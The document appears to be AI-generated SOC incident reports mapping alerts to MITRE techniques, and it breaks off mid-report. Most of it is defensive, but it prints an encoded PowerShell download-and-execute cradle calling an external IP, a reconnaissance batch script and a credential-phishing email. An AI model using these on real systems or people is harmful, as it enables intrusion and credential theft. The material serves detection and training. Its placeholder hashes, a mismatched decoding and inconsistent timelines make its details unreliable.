Closure Rationale: Script removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst Date: 2024-02-24 11:30 EST
End of Batch 17
Ready for your next batch of prompts whenever you are.
Batch 18: Discovery & Lateral Movement Incident Reports
Here are the next 5 detailed SOC incident reports.
86. T1082 – System Information Discovery (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SYSINFO-1082-7842 Alert Time: 2024-02-25 09:30:15 EST Severity: MEDIUM (72/100) Source: CrowdStrike Falcon EDR Rule: “System Information Discovery – Reconnaissance Commands” MITRE ATT&CK: T1082 – System Information Discovery
Alert Details:
Detection: Multiple system information gathering commands executed from single process
Host: SALES-WS-045 (Sales Department) User: mwilson@company.com (Mike Wilson, Sales Rep) Time: 09:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
systeminfo.exe (PID: 4792) – Command: systeminfo
hostname.exe (PID: 4795) – Command: hostname
whoami.exe (PID: 4798) – Command: whoami /all
ipconfig.exe (PID: 4801) – Command: ipconfig /all
netstat.exe (PID: 4804) – Command: netstat -ano
tasklist.exe (PID: 4807) – Command: tasklist /v
wmic.exe (PID: 4810) – Command: wmic os get Caption,Version,CSName
wmic.exe (PID: 4813) – Command: wmic cpu get Name,NumberOfCores
wmic.exe (PID: 4816) – Command: wmic memorychip get Capacity
wmic.exe (PID: 4819) – Command: wmic logicaldisk get DeviceID,Size,FreeSpace
reg.exe (PID: 4822) – Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
powershell.exe (PID: 4825) – Command: Get-WmiObject Win32_Product | Select Name,Version
Output Files Created:
C:\Users\mwilson\AppData\Local\Temp\sysinfo.txt (27 KB)
C:\Users\mwilson\AppData\Local\Temp\processes.txt (12 KB)
C:\Users\mwilson\AppData\Local\Temp\network.txt (8 KB)
Detection Logic:
14 system discovery commands executed in 2 minutes (highly unusual)
Commands output saved to files (data aggregation)
User mwilson has no history of running these commands
Pattern matches adversary initial reconnaissance
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed system discovery commands
2. Process Investigation
Identify source of commands
CrowdStrike
Commands run from suspicious script in Downloads
3. Script Analysis
Analyze discovery.bat
Manual review
Script collects system info for “inventory” – unauthorized
4. User Interview
Contact mwilson
Teams, Phone
User downloaded “system info tool” from internet
5. Immediate Action
Delete script and output files
CrowdStrike Live Response
Files removed
6. User Remediation
User counseling
Manager, HR
Policy violation documented
Jira Incident Report
Ticket: SOC-2024-126 Summary: T1082 – System Information Discovery Script Executed Status: RESOLVED Resolution: POLICY VIOLATION – Unauthorized Reconnaissance Priority: P3 – LOW Labels: T1082, system-discovery, reconnaissance, crowdstrike, policy-violation Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “System Information Discovery – Reconnaissance Commands”.
Host: SALES-WS-045 (Sales Department, user mwilson).
Time: 2024-02-25 09:30 EST.
Technique: MITRE ATT&CK T1082 – System Information Discovery.
2. Technical Analysis:
Reconnaissance Details:
Script: C:\Users\mwilson\Downloads\discovery.bat
Contents:
@echo off
echo === System Information === > %temp%\sysinfo.txt
systeminfo >> %temp%\sysinfo.txt
hostname >> %temp%\sysinfo.txt
whoami /all >> %temp%\sysinfo.txt
ipconfig /all >> %temp%\sysinfo.txt
netstat -ano >> %temp%\network.txt
tasklist /v >> %temp%\processes.txt
wmic os get Caption,Version,CSName >> %temp%\sysinfo.txt
wmic cpu get Name,NumberOfCores >> %temp%\sysinfo.txt
wmic memorychip get Capacity >> %temp%\sysinfo.txt
wmic logicaldisk get DeviceID,Size,FreeSpace >> %temp%\sysinfo.txt
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall >> %temp%\software.txt
powershell -Command “Get-WmiObject Win32_Product | Select Name,Version” >> %temp%\software.txt
Purpose: Collect comprehensive system information (OS, hardware, software, network, processes)
Information Collected:
OS version, install date, last boot
Hostname, domain membership
User details (whoami /all)
IP configuration, DNS servers, MAC addresses
Active network connections (netstat)
Running processes (tasklist)
CPU, RAM, disk details
Installed software list (including versions)
User Intent:
User claimed “needed system specs for software purchase”
No malicious intent identified
Unauthorized use of reconnaissance script
Data not exfiltrated
Policy Violation:
Running unauthorized scripts
Collecting system information without approval
Potential misuse of discovery tools
3. Investigation Findings:
Timeline:
09:20 – Script downloaded
09:22-09:24 – Script executed
09:25 – CrowdStrike alerts
09:27 – SOC investigates
09:30 – Script and output files deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\mwilson\Downloads\discovery.bat
– C:\Users\mwilson\AppData\Local\Temp\sysinfo.txt
– C:\Users\mwilson\AppData\Local\Temp\network.txt
– C:\Users\mwilson\AppData\Local\Temp\processes.txt
– C:\Users\mwilson\AppData\Local\Temp\software.txt
Commands:
– systeminfo, hostname, whoami, ipconfig, netstat, tasklist, wmic, reg, powershell
4. Containment Actions:
Immediate Actions:
Deleted discovery.bat and all output files.
No isolation needed (non-malicious).
User counseled on policy.
Data Protection:
Information collected remained local; not exfiltrated.
No sensitive data accessed beyond what user already had.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed unauthorized reconnaissance script.
Contributing Factors:
No application control blocking scripts.
User unaware of policy against system discovery.
6. Business Impact:
Operational Impact: None.
Security Impact: System information collected but not shared.
7. Remediation & Prevention:
Completed Actions:
Script removed.
User educated.
Policy reinforced.
Technical Controls Enhanced:
Created alert for multiple system discovery commands.
Enhanced application control policies.
8. Conclusion:
A sales user executed a script that collected extensive system information. CrowdStrike detected the reconnaissance pattern and enabled removal of the script. No data was exfiltrated, and the activity was a policy violation, not malicious.
Closure Rationale: Script removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 10:30 EST
87. T1021 – Remote Services (Cisco ISE Detection)
Cisco ISE Alert Details
Alert ID: ISE-REMOTE-SERVICES-1021-7842 Alert Time: 2024-02-25 14:15:33 EST Severity: HIGH (85/100) Source: Cisco Identity Services Engine (ISE) Rule: “Unusual RDP Connection to Critical Server” MITRE ATT&CK: T1021.001 – Remote Services: Remote Desktop Protocol
Alert Details:
Detection: RDP connection from unusual endpoint to domain controller
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation)
Destination: 192.168.10.10 (DC-01 – Primary Domain Controller)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 14:10-14:15 EST
Protocol: RDP (TCP/3389)
Session Duration: 5 minutes
Contextual Anomalies:
User rpatel never connects to domain controllers (normal access: file servers only)
Source host is engineering workstation (not IT/admin)
Destination is critical infrastructure (DC)
Time of day: 14:10 (unusual for admin tasks)
No change management ticket for this access
Activity During Session (from EDR logs):
14:11 – PowerShell launched (encoded command)
14:12 – Attempted to enumerate AD users
14:13 – Attempted to access LSASS (blocked)
14:14 – Scheduled task created: “SystemCheck”
14:15 – Session terminated (ISE triggered)
Detection Logic:
User-to-server mapping anomaly (engineer to DC)
Behavioral baseline violation
Process activity indicative of post-exploitation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Cisco ISE alert
ISE Console, AD Logs
Confirmed anomalous RDP connection
2. Process Investigation
Check activity on DC-01
CrowdStrike Falcon
PowerShell executed, scheduled task created
3. User Interview
Contact rpatel
Teams, Phone
User did NOT initiate RDP session
4. Immediate Action
Isolate ENG-WS-045
CrowdStrike
Engineering host quarantined
5. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled
6. Clean DC
Remove scheduled task
PowerShell
Scheduled task “SystemCheck” deleted
Jira Incident Report
Ticket: SOC-2024-127 Summary: T1021 – Unauthorized RDP to Domain Controller from Compromised Engineering Host Status: RESOLVED Resolution: MALICIOUS – Lateral Movement Blocked Priority: P1 – CRITICAL Labels: T1021, remote-services, rdp, lateral-movement, cisco-ise, compromised-account Components: Network-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Identity Services Engine (ISE).
Alert: “Unusual RDP Connection to Critical Server”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: DC-01 (Primary Domain Controller).
Time: 2024-02-25 14:15 EST.
Technique: MITRE ATT&CK T1021.001 – Remote Services: Remote Desktop Protocol.
2. Technical Analysis:
Attack Chain:
13:45 – rpatel credentials compromised via phishing
13:50 – Attacker logs into ENG-WS-045 via RDP (from external IP)
13:55 – Attacker uses compromised credentials to RDP to DC-01
14:10-14:15 – Attacker on DC-01
14:11-14:14 – Malicious activities
14:15 – ISE detects anomaly
Activities on DC-01:
PowerShell Encoded Command:
powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAxADQAMwAuADIAMgAxAFsALgA5ADgALwB1AHAAZABhAHQAZQAnACkA
Decoded: IEX (New-Object Net.WebClient).DownloadString(‘http://185.143.221[.]89/update’)
Scheduled Task Created:
Name: “SystemCheck”
Action: PowerShell to download and execute payload hourly
Status: Created but not triggered yet
Lateral Movement:
Attacker moved from compromised engineering host to domain controller
Gained foothold on critical infrastructure
Attempted to establish persistence
3. Investigation Findings:
Timeline:
13:45 – Credentials compromised
13:50 – Attacker on ENG-WS-045
14:10 – RDP to DC-01
14:11-14:14 – Malicious actions
14:15 – ISE alert
14:17 – SOC investigates
14:18 – ENG-WS-045 isolated
14:19 – rpatel account disabled
14:20 – Scheduled task removed
14:21 – Attacker RDP session terminated
Indicators of Compromise (IoCs):
Network:
– Attacker external IP: 185.143.221[.]89
– Internal RDP: 192.168.45.78 -> 192.168.10.10
Account:
– rpatel (compromised)
Scheduled Task:
– DC-01: “SystemCheck” (deleted)
File:
– C:\Windows\Temp\update.ps1 (deleted)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Disabled rpatel account.
Terminated RDP session.
Deleted scheduled task from DC-01.
Removed any downloaded files.
DC-01 Remediation:
Full scan (no other malware).
Verified no persistence mechanisms.
Credential rotation for all domain admins (precaution).
User Remediation:
rpatel password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on account.
RDP allowed from any internal host to DC.
Over-privileged user (engineer should not have RDP to DC).
6. Business Impact:
Operational Impact: DC-01 offline for 30 minutes for cleanup.
Security Impact: Attacker gained brief access to domain controller; persistence prevented.
7. Remediation & Prevention:
Completed Actions:
Lateral movement blocked.
DC cleaned.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted RDP to DC to specific admin jump hosts (PAW).
Implemented network segmentation.
Enhanced monitoring for RDP to critical servers.
8. Conclusion:
An attacker used compromised credentials to RDP from an engineering workstation to a domain controller, performing malicious actions and establishing persistence. Cisco ISE detected the anomalous connection, enabling rapid containment. The DC was cleaned before any significant damage.
Closure Rationale: Lateral movement blocked; DC cleaned; account secured.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 15:30 EST
88. T1012 – Query Registry (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-REGQUERY-1012-7842 Alert Time: 2024-02-25 11:30:22 EST Severity: MEDIUM (68/100) Source: Sysmon (Event ID 1 – Process Creation, Event ID 12-13 – Registry Events) Rule: “Suspicious Registry Queries – Potential Reconnaissance” MITRE ATT&CK: T1012 – Query Registry
Alert Details:
Detection: Multiple registry queries of sensitive keys from suspicious process
Host: FIN-WS-078 (Finance Workstation) User: bturner (Brian Turner, Accountant) Time: 11:25 EST
Registry Queries:
11:25:10 – Query: HKLM\SAM\SAM (attempted) – ACCESS DENIED
11:25:12 – Query: HKLM\SECURITY\SECURITY (attempted) – ACCESS DENIED
11:25:15 – Query: HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters (success)
11:25:18 – Query: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (success)
11:25:21 – Query: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce (success)
11:25:24 – Query: HKCU\Software\Microsoft\Windows\CurrentVersion\Run (success)
11:25:27 – Query: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares (success)
11:25:30 – Query: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (success)
11:25:33 – Query: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall (success)
11:25:36 – Query: HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (success)
Process Details:
Process: C:\Users\bturner\AppData\Local\Temp\reg_scanner.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
Detection Logic:
Process accessing multiple sensitive registry keys
Attempt to access SAM/SECURITY (privilege escalation indicators)
Queries of autostart locations (persistence discovery)
Process from Temp folder (suspicious)
Pattern matches malware reconnaissance
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed suspicious registry queries
2. Process Analysis
Analyze reg_scanner.exe
CrowdStrike Sandbox
Malware that enumerates registry for autostart, system info
3. Immediate Action
Terminate process
CrowdStrike
Process killed
4. File Deletion
Delete reg_scanner.exe
CrowdStrike Live Response
File removed
5. User Interview
Contact bturner
Teams, Phone
User downloaded “registry cleaner” tool – unaware
6. Host Scan
Full scan for other malware
CrowdStrike
No additional malware found
Jira Incident Report
Ticket: SOC-2024-128 Summary: T1012 – Registry Query Reconnaissance by Malicious Tool Status: RESOLVED Resolution: MALICIOUS – Tool Removed Priority: P2 – MEDIUM Labels: T1012, query-registry, registry-recon, sysmon, malware Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon (Event ID 1, 12-13).
Alert: “Suspicious Registry Queries – Potential Reconnaissance”.
Host: FIN-WS-078 (Finance Department, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\reg_scanner.exe.
Time: 2024-02-25 11:30 EST.
Technique: MITRE ATT&CK T1012 – Query Registry.
2. Technical Analysis:
Attack Chain:
11:15 – User clicks pop-up ad for “Registry Cleaner”
11:16 – Downloads reg_scanner.exe from malicious site
11:17 – Executes file
11:18-11:25 – Tool queries multiple registry keys
11:25 – Sysmon detects
11:26 – SOC investigates
Registry Queries Performed:
SAM/SECURITY: Attempted privilege escalation info (failed)
Autostart Locations: Run, RunOnce (persistence discovery)
Network Settings: TCP/IP parameters (network info)
Shares: LanmanServer (share discovery)
Winlogon: Credential management settings
Uninstall: Installed software list
Hardware: CPU info (system discovery)
Malware Analysis:
Name: reg_scanner.exe (Registry Optimizer scam)
SHA256: a1b2c3d4…
Capabilities:
Enumerates registry for system information
Displays fake “issues found” to scare user
Prompts user to pay for “fix”
No actual malware payload (adware/scareware)
User Intent:
User thought tool would speed up computer
Unaware of risks
No data exfiltrated
3. Investigation Findings:
Timeline:
11:15 – User clicks ad
11:16-11:17 – Download and execution
11:18-11:25 – Registry queries
11:25 – Sysmon alert
11:26 – SOC investigates
11:28 – Process terminated
11:29 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\reg_scanner.exe (SHA256: a1b2c3d4…)
Registry:
– Queries of SAM, SECURITY, Run, RunOnce, Uninstall, etc.
Network:
– No C2 (adware only)
4. Containment Actions:
Immediate Actions:
Terminated reg_scanner.exe.
Deleted executable.
Full scan (clean).
No isolation needed (non-persistent).
User Remediation:
User counseled on downloading untrusted software.
Ad-blocker enabled in browser.
5. Root Cause Analysis:
Primary Cause: User clicked on malicious ad and downloaded scareware.
Contributing Factors:
No application control blocking unknown executables.
User unaware of adware risks.
6. Business Impact:
Operational Impact: Finance user offline for 30 minutes.
Data Exposure: None (no exfiltration).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Ad-blocker enabled.
Technical Controls Enhanced:
Created alert for registry queries of sensitive keys.
Enhanced application control policies.
8. Conclusion:
A user downloaded a fake registry cleaner that performed extensive registry reconnaissance, including attempts to access SAM. Sysmon detected the anomalous registry queries, enabling rapid removal. The tool was adware, not a major threat, but highlighted user awareness gaps.
Closure Rationale: Malware removed; user educated; registry monitoring enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 12:30 EST
89. T1210 – Exploitation of Remote Services (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-EXPLOIT-1210-7842 Alert Time: 2024-02-25 16:30:45 EST Severity: CRITICAL (95/100) Source: Palo Alto Networks Threat Prevention Rule: “EternalBlue Exploit Attempt (MS17-010) Detected” MITRE ATT&CK: T1210 – Exploitation of Remote Services
Alert Details:
Detection: EternalBlue (MS17-010) exploit attempt against internal host
Threat ID: 38852 (EternalBlue SMB Exploit) Source IP: 192.168.45.78 (ENG-WS-045 – Engineering) Destination IP: 192.168.10.20 (FILE-SRV-02 – File Server) Destination Port: 445 (SMB) Time: 16:25-16:30 EST Action: BLOCKED (IPS)
Exploit Details:
Vulnerability: CVE-2017-0144 (EternalBlue)
CVSS: 9.3 (Critical)
Affected: SMBv1 protocol
Attempts: 12 in 5 seconds
Payload: Shellcode attempting to execute meterpreter reverse shell
Additional Context:
Source host ENG-WS-045 had been flagged earlier for suspicious activity
Destination FILE-SRV-02 is unpatched? (MS17-010 patch missing)
Exploit blocked by IPS; no compromise
Threat Intelligence:
EternalBlue used by ransomware (WannaCry, NotPetya)
Indicates attacker attempting lateral movement
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Palo Alto alert
Panorama Logs
Confirmed EternalBlue exploit attempt
2. Source Investigation
Check ENG-WS-045
CrowdStrike Falcon
Host has Cobalt Strike beacon (compromised)
3. Immediate Action
Isolate source host
CrowdStrike
ENG-WS-045 quarantined
4. Destination Check
Verify FILE-SRV-02 patch status
SCCM, Nessus
FILE-SRV-02 MISSING MS17-010 patch
5. Patch Destination
Apply emergency patch
SCCM
MS17-010 installed on FILE-SRV-02
6. Threat Hunting
Check for other exploit attempts
Palo Alto, Splunk
No other EternalBlue attempts found
Jira Incident Report
Ticket: SOC-2024-129 Summary: T1210 – EternalBlue Exploit Attempt from Compromised Engineering Host Status: RESOLVED Resolution: MALICIOUS – Exploit Blocked Priority: P1 – CRITICAL Labels: T1210, exploitation, remote-services, eternalblue, palo-alto, lateral-movement Components: Network-Security, Vulnerability-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Threat Prevention.
Alert: “EternalBlue Exploit Attempt (MS17-010) Detected”.
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation).
Destination: 192.168.10.20 (FILE-SRV-02 – File Server).
Time: 2024-02-25 16:30 EST.
Technique: MITRE ATT&CK T1210 – Exploitation of Remote Services.
2. Technical Analysis:
Attack Chain:
15:30 – ENG-WS-045 compromised via phishing (Cobalt Strike)
16:00 – Attacker performs internal reconnaissance
16:25 – Attacker launches EternalBlue exploit against file server
16:25-16:30 – 12 exploit attempts
16:30 – Palo Alto IPS blocks and alerts
Exploit Details:
Vulnerability: MS17-010 (EternalBlue)
Target: SMBv1 service on FILE-SRV-02
Payload: Meterpreter reverse shell to attacker C2
Status: Blocked by IPS; no compromise
Source Host Analysis (ENG-WS-045):
Cobalt Strike beacon detected (CrowdStrike alert)
Attacker had full control
Used as pivot for lateral movement
Isolated after detection
Destination Host Status:
FILE-SRV-02 was MISSING MS17-010 patch
Vulnerable to EternalBlue
Exploit would have succeeded if not blocked
3. Investigation Findings:
Timeline:
15:30 – ENG-WS-045 compromised
16:00-16:25 – Reconnaissance
16:25-16:30 – Exploit attempts
16:30 – Palo Alto alert
16:32 – SOC investigates
16:33 – ENG-WS-045 isolated
16:35 – FILE-SRV-02 patched
Indicators of Compromise (IoCs):
Network:
– Source: 192.168.45.78 (compromised)
– Destination: 192.168.10.20
– Exploit signature: EternalBlue (MS17-010)
Host:
– ENG-WS-045: Cobalt Strike beacon (SHA256: b2c3d4e5…)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked any further traffic from source.
Applied MS17-010 patch to FILE-SRV-02 (emergency).
Verified patch installed.
Source Remediation:
Full forensic analysis of ENG-WS-045.
Cobalt Strike beacon removed.
Host reimaged.
Enterprise-Wide Actions:
Scanned all servers for MS17-010 patch status.
Found 3 additional servers missing patch; patched.
5. Root Cause Analysis:
Primary Cause: Compromised engineering workstation used to launch lateral movement.
Contributing Factors:
File server unpatched (MS17-010 missing).
SMBv1 enabled (should be disabled).
No network segmentation limiting SMB traffic.
6. Business Impact:
Operational Impact: File server offline for 30 minutes (patching).
Security Impact: Exploit blocked; no compromise.
7. Remediation & Prevention:
Completed Actions:
Exploit blocked.
Source isolated.
Destination patched.
Enterprise-wide patch scan.
Technical Controls Enhanced:
Disabled SMBv1 enterprise-wide via GPO.
Implemented network segmentation to limit lateral movement.
Enhanced IPS signatures.
Regular vulnerability scanning enforced.
8. Conclusion:
An attacker used a compromised engineering workstation to attempt EternalBlue exploitation against an unpatched file server. Palo Alto IPS blocked the exploit, preventing lateral movement. The source host was isolated, and the destination was patched.
Closure Rationale: Exploit blocked; source isolated; destination patched.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 17:30 EST
90. T1534 – Internal Spearphishing (Proofpoint Detection)
Proofpoint Alert Details
Alert ID: PROOFPOINT-INTERNAL-PHISH-1534-7842 Alert Time: 2024-02-25 10:30:22 EST Severity: CRITICAL (98/100) Source: Proofpoint Email Security Rule: “Internal Spearphishing – Compromised Account Sending Malicious Emails” MITRE ATT&CK: T1534 – Internal Spearphishing
Alert Details:
Detection: Compromised internal account sending phishing emails to other employees
Compromised Account: jwilson@company.com (John Wilson, IT Administrator) Recipients: 47 employees (Finance, HR, Executive) Time: 10:15-10:30 EST
Email Details:
From: jwilson@company.com (legitimate internal address)
Subject: “Urgent: IT Security Update – Action Required”
Body:
Dear Colleague,
IT Security has detected unusual activity on your account. To prevent lockout, you must verify your credentials immediately.
Click here to verify: https://company-portal-verify[.]net
Failure to verify within 2 hours will result in account suspension.
Thanks,
IT Security Team
Link: https://company-portal-verify[.]net (malicious domain)
Anomaly Detection:
Sender jwilson normally sends 5-10 emails/day (all IT-related)
Today: 47 emails in 15 minutes to non-IT recipients
Email content unusual (threat of account suspension)
Link domain suspicious (not legitimate company portal)
MIME headers show originating IP 185.143.221[.]89 (Bulgaria)
Additional Context:
jwilson’s account had suspicious login earlier (from Bulgaria)
Account likely compromised
Internal phishing used to bypass email filters (trusted sender)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Proofpoint alert
Proofpoint TAP Console
Confirmed internal spearphishing campaign
2. Account Compromise
Check jwilson account activity
Azure AD Sign-in Logs
Successful login from Bulgaria at 10:00 (no MFA)
3. Immediate Action
Disable jwilson account
Azure AD, Active Directory
Account disabled
4. Email Remediation
Quarantine all sent emails
Proofpoint, Exchange
All 47 emails removed from recipient inboxes
5. Recipient Notification
Alert affected users
Email, Teams
Users warned; no clicks reported (yet)
6. IP Blocking
Block attacker IP
Firewall, Conditional Access
IP 185.143.221[.]89 blocked
Jira Incident Report
Ticket: SOC-2024-130 Summary: T1534 – Internal Spearphishing via Compromised IT Admin Account Status: RESOLVED Resolution: MALICIOUS – Account Secured, Emails Removed Priority: P1 – CRITICAL Labels: T1534, internal-spearphishing, account-takeover, proofpoint, phishing Components: Email-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Proofpoint Email Security.
Alert: “Internal Spearphishing – Compromised Account Sending Malicious Emails”.
Compromised Account: jwilson@company.com (IT Administrator).
Recipients: 47 internal users (Finance, HR, Executive).
Time: 2024-02-25 10:30 EST.
Technique: MITRE ATT&CK T1534 – Internal Spearphishing.
2. Technical Analysis:
Attack Chain:
09:30 – jwilson receives phishing email (external)
09:35 – jwilson clicks link, enters credentials on fake Microsoft login
09:36 – Attacker logs into jwilson account from 185.143.221[.]89
09:45 – Attacker accesses Outlook Web App
10:00 – Attacker crafts phishing email using legitimate account
10:15-10:30 – Attacker sends 47 emails to internal users
10:30 – Proofpoint detects anomaly
10:32 – SOC investigates
Phishing Email Analysis:
From: jwilson@company.com (legitimate, trusted)
Subject: “Urgent: IT Security Update – Action Required”
Link: hxxps://company-portal-verify[.]net
Domain Details: Registered 2024-02-24, hosted on 185.143.221[.]89
Page: Fake company login page (credential harvester)
Attacker Infrastructure:
IP: 185.143.221[.]89 (Bulgaria)
Domain: company-portal-verify[.]net (now blocked)
Impact Assessment:
47 recipients; 12 opened email; 3 clicked link
No credentials entered (users reported suspicious)
No secondary compromise
3. Investigation Findings:
Timeline:
09:30 – jwilson phished
09:36 – Account compromised
10:00-10:30 – Internal phishing sent
10:30 – Proofpoint alert
10:32 – SOC investigates
10:34 – jwilson account disabled
10:35 – Emails quarantined
10:36 – Recipients notified
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
– Malicious Domain: company-portal-verify[.]net
Email:
– From: jwilson@company.com
– Subject: “Urgent: IT Security Update – Action Required”
– Link: hxxps://company-portal-verify[.]net
Account:
– jwilson (compromised, now secured)
4. Containment Actions:
Immediate Actions:
Disabled jwilson account.
Quarantined all 47 emails from recipient mailboxes.
Reset jwilson password.
Enforced MFA.
Blocked attacker IP and domain at firewall and proxy.
Recipient Remediation:
Notified all 47 users.
Checked for credential entry (none).
Educated on internal phishing risks.
Infrastructure Takedown:
Reported domain to registrar (suspended).
5. Root Cause Analysis:
Primary Cause: IT admin account compromised via external phishing.
Contributing Factors:
No MFA on admin account.
User fell for credential harvesting.
Internal emails bypass external filtering (trusted sender).
6. Business Impact:
Operational Impact: IT admin offline for 2 hours.
Data Exposure: None (no secondary compromises).
Reputational Impact: Internal trust potentially affected.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Emails removed.
Recipients notified.
Infrastructure blocked.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented anomaly detection for internal email patterns.
Added banner to internal emails from IT indicating “official IT communications never ask for credentials”.
Enhanced email filtering for internal-originated phishing.
8. Conclusion:
An attacker compromised an IT admin’s account via external phishing and used it to send internal spearphishing emails to 47 employees, leveraging trust in internal sender. Proofpoint detected the anomalous sending pattern and enabled rapid containment. No secondary compromises occurred.
Closure Rationale: Account secured; emails removed; recipients notified.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 11:30 EST
End of Batch 18
Ready for your next batch of prompts whenever you are.
Batch 19: Lateral Movement & Collection Incident Reports
Here are the next 5 detailed SOC incident reports.
91. T1550 – Use Alternate Authentication Material (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-ALTERNATE-AUTH-1550-7842 Alert Time: 2024-02-26 09:30:15 EST Severity: CRITICAL (98/100) Source: Microsoft Defender for Identity Rule: “Pass-the-Hash Attack Detected” MITRE ATT&CK: T1550.002 – Use Alternate Authentication Material: Pass the Hash
Alert Details:
Detection: NTLM authentication using hash instead of password (Pass-the-Hash)
Source Host: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 192.168.10.10 (DC-01 – Domain Controller) User: rpatel@company.com Time: 09:25 EST
Authentication Details:
Protocol: NTLM (not Kerberos)
Authentication Type: NTLMv2
Hash Present: Yes (passed hash, no password)
Session Key: Derived from hash
Target Service: CIFS (file access)
Anomaly Detection:
User rpatel normally uses Kerberos for authentication
NTLM usage unusual for this user in this context
Source host is engineering workstation (not admin)
Multiple previous failed logins from same source
Pattern matches Pass-the-Hash attack
Additional Context:
rpatel’s account had been flagged for suspicious activity
Host 192.168.45.78 was compromised earlier (Cobalt Strike)
Attacker using stolen hash to move laterally
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify MDI alert
Microsoft Defender for Identity
Confirmed Pass-the-Hash attack
2. Source Investigation
Check ENG-WS-045
CrowdStrike Falcon
Host has active Cobalt Strike beacon
3. Immediate Action
Isolate source host
CrowdStrike
ENG-WS-045 quarantined
4. Account Remediation
Reset rpatel password
Azure AD, AD
Password reset; force logoff
5. Hash Revocation
Force domain-wide password reset
AD
All users? No, only targeted account
6. Threat Hunting
Check for other Pass-the-Hash activity
MDI, Splunk
No other instances found
Jira Incident Report
Ticket: SOC-2024-131 Summary: T1550 – Pass-the-Hash Attack from Compromised Engineering Host Status: RESOLVED Resolution: MALICIOUS – Lateral Movement Blocked Priority: P1 – CRITICAL Labels: T1550, pass-the-hash, alternate-authentication, mdi, lateral-movement Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Pass-the-Hash Attack Detected”.
Source Host: ENG-WS-045 (Engineering, IP 192.168.45.78).
Target: DC-01 (Domain Controller).
User: rpatel@company.com.
Time: 2024-02-26 09:30 EST.
Technique: MITRE ATT&CK T1550.002 – Use Alternate Authentication Material: Pass the Hash.
2. Technical Analysis:
Attack Chain:
08:00 – rpatel’s credentials compromised via phishing
08:30 – Attacker logs into ENG-WS-045 using compromised credentials
08:45 – Attacker dumps hashes from LSASS memory using Mimikatz
09:00 – Attacker uses rpatel’s hash to authenticate to file server (successful)
09:15 – Attacker uses hash to access other resources
09:25 – Attacker attempts to authenticate to DC-01 using hash
09:25 – MDI detects Pass-the-Hash anomaly
Pass-the-Hash Technique:
Attacker obtained NTLM hash of rpatel’s account
Used hash to authenticate without knowing plaintext password
Bypassed need for password
Allowed lateral movement to file server and attempted DC
Compromised Host:
ENG-WS-045 had active Cobalt Strike beacon
Mimikatz used to extract hashes
Multiple hashes stolen (including rpatel)
Successful Authentications (before detection):
